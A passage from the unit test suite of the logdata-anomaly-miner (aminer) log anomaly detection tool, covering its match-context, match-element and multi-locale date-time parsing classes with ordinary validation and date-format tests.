self.assertTrue(jao.collection['c.w']) self.assertTrue(jao.collection['c.rata']) self.assertTrue(jao.collection['c.tic.tac']) self.assertTrue(jao.collection['c.brat[0]']) self.assertTrue(jao.collection['c.brat[1]']) self.assertTrue(jao.collection['c.brat[2].key[0]']) self.assertTrue(jao.collection['c.brat[2].key[1]']) self.assertTrue(jao.collection['c.brat[2].food']) self.assertTrue(jao.collection['c.brat[3]']) self.assertTrue(jao.collection['c.bist']) self.assertTrue(jao.collection['foo']) self.assertEqual(12,len(jao.collection)) self.assertEqual("b",jao.collection["a"]["value"]) self.assertEqual("g",jao.collection["c.w"]["value"]) self.assertEqual("mahatta",jao.collection["c.rata"]["value"]) self.assertEqual("toe",jao.collection["c.tic.tac"]["value"]) self.assertEqual("worst",jao.collection["c.brat[0]"]["value"]) self.assertEqual("wuast",jao.collection["c.brat[1]"]["value"]) self.assertEqual("wurst",jao.collection["c.brat[2].key[0]"]["value"]) self.assertEqual("fleisch",jao.collection["c.brat[2].key[1]"]["value"]) self.assertEqual("veggie",jao.collection["c.brat[2].food"]["value"]) self.assertEqual("blues",jao.collection["c.brat[3]"]["value"]) self.assertEqual("bar",jao.collection["foo"]["value"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MatchContextTest.py000066400000000000000000000121101500476301700272310ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext, DebugMatchContext from unit.TestBase import TestBase class MatchContextTest(TestBase): """Unittests for the MatchContext and DebugMatchContext.""" def test1update_successful(self): """Update the MatchContext and DebugMatchContext with allowed values.""" data = b"this is an example of a log line." match_context = MatchContext(data) match_context.update(b"this is an example") self.assertEqual(match_context.match_data, b" of a log line.") match_context = MatchContext(data) match_context.update([b"t", b"h", b"i", b"s"]) self.assertEqual(match_context.match_data, b" is an example of a log line.") match_context = MatchContext(data) match_context.update(b"some other text") self.assertEqual(match_context.match_data, b"ple of a log line.") match_context = DebugMatchContext(data) match_context.update(b"this is an example ") self.assertEqual(match_context.match_data, b"of a log line.") self.assertEqual(match_context.get_debug_info(), 'Starting match update on "this is an example of a log line."\n Removed: "this is an example ", remaining 14' ' bytes\n Shortest unmatched data: "of a log line."\n') self.assertEqual(match_context.get_debug_info(), ' Shortest unmatched data: "of a log line."\n') match_context.update(b"of") self.assertEqual(match_context.get_debug_info(), ' Removed: "of", remaining 12 bytes\n Shortest unmatched data: " a log line."\n') match_context.update(b" a log line.") self.assertEqual(match_context.get_debug_info(), ' Removed: " a log line.", remaining 0 bytes\n Shortest unmatched data: ""\n') self.assertRaises(ValueError, match_context.update, b" a log line.") self.assertEqual( match_context.get_debug_info(), ' Current data does not start with " a log line."\n Shortest unmatched data: ""\n') match_context.update(b"") def test2update_fail(self): """Update the DebugMatchContext with not allowed values.""" match_context = DebugMatchContext(b"this is an example of a log line.") self.assertRaises(TypeError, match_context.update, "this is an example") self.assertRaises(TypeError, match_context.update, [b"t", b"h", b"i", b"s"]) self.assertRaises(ValueError, match_context.update, b"some other text") def test3_match_context_init_input_validation(self): """Check if input is validated for MatchContext.__init__().""" self.assertRaises(TypeError, MatchContext, None) self.assertRaises(TypeError, MatchContext, "path") self.assertRaises(TypeError, MatchContext, True) self.assertRaises(TypeError, MatchContext, 123) self.assertRaises(TypeError, MatchContext, 123.22) self.assertRaises(TypeError, MatchContext, {"id": "path"}) self.assertRaises(TypeError, MatchContext, ["path"]) self.assertRaises(TypeError, MatchContext, []) self.assertRaises(TypeError, MatchContext, ()) self.assertRaises(TypeError, MatchContext, set()) def test4_match_context_update_input_validation(self): """Check if MatchContext.update() fails if len(match_string) does not work.""" data = b"this is an example of a log line." match_context = MatchContext(data) self.assertRaises(TypeError, match_context.update, None) self.assertRaises(TypeError, match_context.update, True) self.assertRaises(TypeError, match_context.update, 123) self.assertRaises(TypeError, match_context.update, 123.22) self.assertRaises(TypeError, match_context.update, match_context) def test5_debug_match_context_init_input_validation(self): """Check if input is validated for DebugMatchContext.__init__().""" self.assertRaises(TypeError, DebugMatchContext, None) self.assertRaises(TypeError, DebugMatchContext, "path") self.assertRaises(TypeError, DebugMatchContext, True) self.assertRaises(TypeError, DebugMatchContext, 123) self.assertRaises(TypeError, DebugMatchContext, 123.22) self.assertRaises(TypeError, DebugMatchContext, True) self.assertRaises(TypeError, DebugMatchContext, {"id": "path"}) self.assertRaises(TypeError, DebugMatchContext, ["path"]) self.assertRaises(TypeError, DebugMatchContext, []) self.assertRaises(TypeError, DebugMatchContext, ()) self.assertRaises(TypeError, DebugMatchContext, set()) def test6_debug_match_context_update_input_validation(self): """Check if input is validated for DebugMatchContext.update().""" data = b"this is an example of a log line." match_context = MatchContext(data) self.assertRaises(TypeError, match_context.update, None) self.assertRaises(TypeError, match_context.update, True) self.assertRaises(TypeError, match_context.update, 123) self.assertRaises(TypeError, match_context.update, 123.22) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MatchElementTest.py000066400000000000000000000227601500476301700272120ustar00rootroot00000000000000import unittest from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class MatchElementTest(TestBase): """Unittests for the MatchElement.""" path = "path" match_string = b"12.5" match_object = 12.5 def test1get_path(self): """Test if get_path works properly.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_path(), self.path) def test2get_match_string(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_match_string(), self.match_string) def test3get_match_object(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_match_object(), self.match_object) def test4get_children(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_children(), None) def test5annotate_match(self): """This test case checks if all possible annotations are created correctly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.annotate_match(None), "root: root a1: a1 a2: a2 a3: a3 b1: b1 b2: b2 b3: b3") self.assertEqual(root_element.annotate_match(""), "root: root\n a1: a1\n a2: a2\n a3: a3\n b1: b1\n b2: b2\n " "b3: b3") self.assertEqual(root_element.annotate_match("--"), "--root: root\n-- a1: a1\n-- a2: a2\n-- a3: a3\n-- b1: b1\n" "-- b2: b2\n-- b3: b3") def test6serialize_object(self): """This test case checks if all child objects are serialized correctly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.serialize_object(), {"path": "root", "match_object": b"root", "match_string": b"root", "children": [ {"path": "a1", "match_object": b"a1", "match_string": b"a1", "children": [ {"path": "a2", "match_object": b"a2", "match_string": b"a2", "children": [{"path": "a3", "match_object": b"a3", "match_string": b"a3", "children": []}]}]}, {"path": "b1", "match_object": b"b1", "match_string": b"b1", "children": [ {"path": "b2", "match_object": b"b2", "match_string": b"b2", "children": [{"path": "b3", "match_object": b"b3", "match_string": b"b3", "children": []}]}]}]}) def test7str(self): """Test the string representation of the MatchElements.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.__str__(), "MatchElement: path = root, string = root, object = root, children = 2") root_element = MatchElement("match", b"string", 2, None) self.assertEqual(root_element.__str__(), "MatchElement: path = match, string = string, object = 2, children = 0") def test8init_path_input_validation(self): """Check if path is validated in __init__().""" self.assertRaises(TypeError, MatchElement, b"path", self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, True, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123.22, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, {"id": "path"}, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, ["path"], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, [], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, (), self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, set(), self.match_string, self.match_object, None) def test9init_match_string_input_validation(self): """Check if match_string is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, "path", self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, True, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123.22, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, {"id": "path"}, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, ["path"], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, [], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, (), self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, set(), self.match_object, None) def test10init_match_object_input_validation(self): """Check if match_object is validated in __init__().""" MatchElement(self.path, self.match_string, b"", None) MatchElement(self.path, self.match_string, "path", None) MatchElement(self.path, self.match_string, True, None) MatchElement(self.path, self.match_string, 123, None) MatchElement(self.path, self.match_string, 123.22, None) MatchElement(self.path, self.match_string, {"id": "path"}, None) MatchElement(self.path, self.match_string, ["path"], None) MatchElement(self.path, self.match_string, [], None) MatchElement(self.path, self.match_string, (), None) MatchElement(self.path, self.match_string, set(), None) MatchElement(self.path, self.match_string, MatchElement(self.path, self.match_string, self.match_object, None), None) def test11init_children_input_validation(self): """Check if children is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, b"path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, "path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, True) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123.22) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, {"id": "path"}) self.assertRaises(ValueError, MatchElement, self.path, self.match_string, self.match_object, []) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, set()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ["string"]) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, [b"string"]) def test12init_child_elements_with_no_path(self): """This test case checks, whether an exception is raised, when the path is None and children are passed.""" self.assertRaises(ValueError, MatchElement, None, self.match_string, self.match_object, [ MatchElement(self.path, self.match_string, self.match_object, None)]) def test13annotate_match_indent_str_input_validation(self): """Check if indent_str is validated in annotate_match().""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertRaises(TypeError, match_element.annotate_match, b" ") self.assertRaises(TypeError, match_element.annotate_match, [" ", "-"]) self.assertRaises(TypeError, match_element.annotate_match, 123.22) self.assertRaises(TypeError, match_element.annotate_match, {"id": "path"}) self.assertRaises(TypeError, match_element.annotate_match, ["path"]) self.assertRaises(TypeError, match_element.annotate_match, []) self.assertRaises(TypeError, match_element.annotate_match, ()) self.assertRaises(TypeError, match_element.annotate_match, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/MultiLocaleDateTimeModelElementTest.py000066400000000000000000001217571500476301700327740ustar00rootroot00000000000000import unittest import locale import pytz import logging from io import StringIO from pwd import getpwnam from grp import getgrnam from datetime import datetime, timezone from aminer.parsing.DateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers class MultiLocaleDateTimeModelElementTest(TestBase): """ Unittests for the MultiLocaleDateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). """ id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)], start_year=2021) # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/format1", self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format3", self.path, date, 1549539600, None) # test normal date with fractions data = b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1549539600, None) # test with only date defined data = b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format4", self.path, date, 1549497600, None) data = b"Feb 25 something happened" date = b"Feb 25" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(2021, 2, 25, tzinfo=tz_gmt10) # total_seconds should be in UTC, so the timezones are parsed out. total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=tz_gmt10)).days * 86400 - dtm.utcoffset().total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format7", self.path, date, total_seconds, None) # British date data = b"13 Apr 2019 something happened" date = b"13 Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format8", self.path, date, 1555113600, None) # British date 2 data = b"13th Apr 2019 something happened" date = b"13th Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format9", self.path, date, 1555113600, None) # British date 3 data = b"13/04/2019 something happened" date = b"13/04/2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format10", self.path, date, 1555113600, None) # US date data = b"04-13-2019 something happened" date = b"04-13-2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format11", self.path, date, 1555113600, None) # Austrian date no year - year should already be learnt. # start year has to be 2021, because all other formats have defined years. data = b"13.04. 15:12:54:201 something happened" date = b"13.04. 15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format12", self.path, date, 1618326774.201, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) multi_locale_dtme.latest_parsed_timestamp = None # Austrian time no date data = b"15:12:54:201 something happened" date = b"15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, datetime.now().month, datetime.now().day, 15, 12, 54, 201, tzinfo=timezone.utc) # total_seconds should be in UTC, so the timezones are parsed out. delta = (dtm - datetime(1970, 1, 1, tzinfo=dtm.tzinfo)) total_seconds = delta.days * 86400 + delta.seconds + delta.microseconds / 1000 self.compare_match_results(data, match_element, match_context, self.id_ + "/format5", self.path, date, total_seconds, None) # test with only time defined. Here obviously the seconds can not be tested. data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results( data, match_element, match_context, self.id_ + "/format6", self.path, date, match_element.match_object, None) def test2wrong_date(self): """Test if wrong input data does not return a match.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) # wrong day data = b"32.03.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # British date data = b"13 Dezember 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"Date %%d: %d.%m.%Y %H:%M:%S%z", None, None)]) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the MultiLocaleDateTimeModelElement.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1")]) def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8")]) def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2017) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1486467600, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2020) data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609500000, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) start_year = multi_locale_dtme.start_year data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, 2020) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609545540, None) self.assertEqual(multi_locale_dtme.start_year, 2021) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + 